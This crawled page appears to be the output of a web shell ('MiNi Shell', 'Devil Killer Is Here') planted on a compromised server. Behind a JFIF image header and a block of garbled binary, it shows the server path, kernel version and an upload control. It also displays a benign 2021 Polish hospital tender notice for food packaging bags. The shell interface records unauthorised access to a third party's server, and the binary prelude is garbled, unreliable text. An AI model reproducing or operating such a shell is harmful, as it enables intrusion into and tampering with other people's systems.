JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211005/0021072501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa worków foliowych, torebek papierowych i innych opakowań gospodarczych dla potrzeb Działu Żywienia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Szpital Kliniczny nr 1 w Lublinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431029234</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Staszica 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-081</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@spsk1.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://portal.smartpzp.pl/spsk1</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa worków foliowych, torebek papierowych i innych opakowań gospodarczych dla potrzeb Działu Żywienia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-86768a0a-25d5-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00210725</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00057144/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">2.2.37 środki czystościowe ogólnego zastosowania</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/spsk1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/spsk1</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami,<br/>wszczególności składanie ofert oraz oświadczeń, odbywa się przy użyciu środków<br/>komunikacjielektronicznej zapewnionych przez system zapewniający obsługę procesu udzielania<br/>zamówieńpublicznych za pośrednictwem środków komunikacji elektronicznej, zwany dalej<br/>Systemem.3. Systemjest dostępny pod adresem: https://portal.smartpzp.pl/spsk1.4. Przeglądanie i<br/>pobieranie publicznejtreści dokumentacji postępowania nie wymaga posiadania konta w Systemie, ani<br/>logowania doSystemu.5. Za pośrednictwem posiadanego w Systemie konta Użytkownika<br/>Zewnętrznego odbywa siękomunikacja Wykonawcy z Zamawiającym w postępowaniu, w<br/>szczególności: przekazywaniedokumentów, oświadczeń, informacji, pytań, wniosków w ramach<br/>postępowania.6. Za pośrednictwemposiadanego w Systemie konta Jednostki Zamawiającej oraz kont<br/>jej Użytkowników Wewnętrznychodbywa się komunikacja Zamawiającego z Wykonawcą w<br/>postępowaniu, w szczególności:przekazywanie wezwań i zawiadomień, informacji, odpowiedzi na<br/>pytania.7. Zadawanie pytań przezWykonawców odbywa się w zakładce „Pytania do postępowania”. Po<br/>otwarciu ofert, komunikacjamiędzy Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia,<br/>wnioski, zawiadomienia orazinformacje, przekazywane są w formie elektronicznej za pośrednictwem<br/>Platformy, w zakładce„Korespondencja”, która dla Wykonawcy jest widoczna w Zakładce „Oferty”, po<br/>zaznaczeniu numeruzłożonej oferty. Za datę wpływu oświadczeń, wniosków, zaświadczeń oraz<br/>informacji przyjmuje się datęzapisania plików na serwerze. Aktualna data i godzina, zsynchronizowane<br/>z Głównym Urzędem Miar,wyświetlane są w prawym górnym rogu Platformy. 8. Do pełnego i<br/>prawidłowego korzystania zSystemu przez Użytkowników Zewnętrznych konieczne jest posiadanie<br/>przez co najmniej jednegouprawnionego Użytkownika Zewnętrznego Wykonawcy elektronicznego<br/>podpisu kwalifikowanego lubpodpisu zaufanego lub podpisu osobistego służącego do autentykacji i<br/>podpisu.9. Korzystanie zSystemu możliwe jest na 2 sposoby, pod warunkiem spełnienia następujących<br/>minimalnych wymagańtechnicznych:a) Oprogramowanie zewnętrzne (dostawcy podpisu<br/>kwalifikowanego):• Mozzilla Firefoxver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera<br/>ver. 58 i późniejsze, Microsoft Edgever 18 i późniejsze, Internet Explorer 11,• Lista zalecanych<br/>przeglądarek internetowych: GoogleChrome, Mozilla Firefox, Opera. Zalecane jest używanie<br/>najnowszych wersji przeglądarek,• systemoperacyjny Windows 7 i późniejsze.b) Oprogramowanie<br/>wbudowane w SmartPZP:• zainstalowaneśrodowisko Java w wersji min. 1.8 (jre),• w przypadkuprzeglądarek Opera, Chrome i Firefox należydoinstalować dodatek do przeglądarki Szafir SDK Web,•<br/>oprogramowanie SzafirHost w systemieoperacyjnym.13. W sytuacji awarii Systemu lub przerwy<br/>technicznej działania Systemu Zamawiającydopuszcza komunikację za pomocą poczty elektronicznej<br/>na adres: mzubala@spsk1.lublin.pl (niedotyczy składania ofert).14. Maksymalny rozmiar pojedynczych<br/>plików przesyłanych za pośrednictwemSystemu wynosi 100 MB. Za pośrednictwem Systemu<br/>możnaprzesłać wiele pojedynczych plików lubplik skompresowany do archiwum (ZIP) zawierający<br/>wiele<br/>pojedynczych plików.18. Dopuszczalneformaty przesyłanych danych tj. plików o wielkości do 100 MB w<br/>formatach .png, .jpg, .jpeg, .gif, .doc,.docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar,<br/>.7zip, .txt, .ath, .xml, .dwg, .xades, .tar,.7z, .eml, .msg</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EO/EZ-2734/44/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Worek z folii 18 cm x 35 cm (po rozłożeniu 26 cm x 35 cm), biały lub przezroczysty, jednorazowego użytku, do pakowania art. spożywczych, op. a 1000 szt. <br/>Worek z folii z wycięciem na rączkę, poj. 20 kg ( rozmiar: dł. 55 cm z wycięciem na rączkę, szer. 42 cm, po rozłożeniu 60 cm), biały lub przezroczysty, jednorazowego użytku do przenoszenia art. żywnościowych, op. a 100 szt.<br/>Reklamówka szelkowa poj. 5 kg w kolorze białym, op. 200 szt.<br/>Folia spożywcza w rolce, przezroczysta, szerokość 30 cm, długość 200 m.<br/>Papier do pieczenia obustronnie powlekany w rulonach o wymiarach: długość 20 m, szerokość ok. 38 cm, temp. pieczenia 220º C </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18930000-7 - Worki i torby</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy cząstkowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Torebki papierowe krzyżowe poj. 3 kg<br/>Szerokość: 23 cm<br/>Wysokość: 37 cm<br/>Wytrzymałość: 3 kg<br/>Kolor: szary<br/>Gramatura: 80 – 125 g/m²<br/>Opakowanie zawiera 10 kg torebek<br/>Ilość torebek w opakowaniu: ok. 500 szt. <br/>Torebki papierowe krzyżowe poj. 1 kg<br/>Opakowanie zawiera około 10 kg torebek. Ilość w opakowaniu około 650 szt.<br/>Kolor: szary<br/>Gramatura: 80 – 125 g/m²<br/>Wymiary: 15 x 6 x 27 cm<br/>Torebki papierowe krzyżowe poj. 0,5 kg <br/>Opakowanie zawiera 10 kg torebek. Ilość torebek w opakowaniu: ok. 760 szt.<br/>Kolor: szary<br/>Gramatura: 80 - 125 g/m²<br/>Wymiary: 16 x 7 x 23 cm </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18930000-7 - Worki i torby</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy cząstkowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">•	Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana niniejszej umowy jest możliwa w przypadku:a) wycofania z dystrybucji przedmiotu<br/>umowy i zastąpienia go produktem o parametrach nie gorszych niż oferowany, za cenę taką jaka<br/>została ustalona w niniejszej umowie,b) zmiany terminu dostawy z przyczyn niezależnych od<br/>Wykonawcy,c) ustawowej zmiany stawki podatku VAT,d) wprowadzenia nowej technologii lub<br/>innych okoliczności pozwalających na obniżenie ceny przedmiotu umowy,e) wprowadzenia<br/>nowej technologii lub zaprzestania produkcji lub wycofanie z obrotu lub wstrzymanie w obrocie<br/>asortymentu objętego niniejszą umową (Zamawiający dopuszcza jego zastąpienie wyłącznie<br/>produktem równoważnym lub o wyższych parametrach jakościowych, przy zastrzeżeniu braku<br/>możliwości podwyższenia ceny), f) zmiany nazwy producenta produktu objętego umową, g)<br/>zmiany wielkości opakowania (Wykonawca przeliczy pozostałą ilość niezrealizowanego<br/>asortymentu - w zaokrągleniu w górę - aby możliwa była realizacja pozostałej części przedmiotu<br/>zamówienia),h) zmian danych identyfikujących strony - zgodnie z zapisami w aktualnym odpisie<br/>z właściwego rejestru2. Zamawiający przewiduje także możliwość dokonania zmiany umowy na<br/>podstawie artykułu 455 ust. 1 pkt. 2 i 3:<br/>2.1. Zgodnie z art. 455 ust. 1 pkt 2 p.z.p.<br/>2.2. Zgodnie z art. 455 ust. 1 pkt 3 p.z.p.<br/>3. Obniżenie ceny oferowanych produktów przez Wykonawcę może nastąpić w każdym czasie i<br/>nie wymaga zgody Zamawiającego ani sporządzania aneksu do umowy.<br/>4. Zamawiający przewiduje zmianę terminu obowiązywania umowy w przypadku:<br/>a) wcześniejszego jej zrealizowania w zakresie dostaw przedmiotu umowy – wówczas umowa<br/>wygasa;<br/>b) niewyczerpania wartości umowy w terminie jej obowiązywania – wówczas w drodze aneksu,<br/>można przedłużyć przedmiotową umowę nie dłużej jednak niż o 6 miesięcy, w zakresie zadań w<br/>których w okresie obowiązywania umowy<br/>nie dokonano jej realizacji w ilościach określonych w poszczególnych pozycjach oferty5. Inne zmiany umowy dopuszczalne będą o ile nie będą istotne w stosunku do treści oferty.<br/>6. Zmiana niniejszej umowy wymaga formy pisemnej pod rygorem nieważności, z zastrzeżeniem<br/>ust. 1 lit. c) oraz ust 3.<br/>7. Każda zmiana może nastąpić w drodze aneksu do umowy, po zaakceptowaniu przez<br/>Zamawiającego wniosku Wykonawcy,<br/>z zastrzeżeniem ust. 1 lit. c) oraz ust 3.<br/>8. Wniosek winien być złożony w formie pisemnej i zawierać uzasadnienie, z zastrzeżeniem ust.<br/>1 lit. c) oraz ust 3.<br/>9. W przypadku braku dostępności oferowanego produktu z przyczyn leżących po stronie<br/>producenta Wykonawca zobowiązany<br/>jest dostarczyć produkt zamienny po uprzednim pisemnym zawiadomieniu o tym Zamawiającego<br/>i uzyskaniu od niego pisemnej zgody. Cena produktu zamiennego nie może być wyższa niż<br/>produktu podanego w ofercie.<br/>10. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby<br/>wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy p.z.p., w celu<br/>wykazania spełniania warunków udziału w postępowaniu, wykonawca jest obowiązany wykazać<br/>zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je<br/>w stopniu nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w<br/>trakcie postępowania o udzielenie zamówienia. Przepis art. 122 ustawy p.z.p. stosuje się<br/>odpowiednio.<br/>11. Zmiana niniejszej umowy jest możliwa jeżeli łączna wartość zmian jest mniejsza niż progi<br/>unijne oraz jest niższa niż 10% wartości pierwotnej umowy.<br/>12. Zmiana niniejszej umowy wymaga formy pisemnej pod rygorem nieważności <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/spsk1</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-15 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com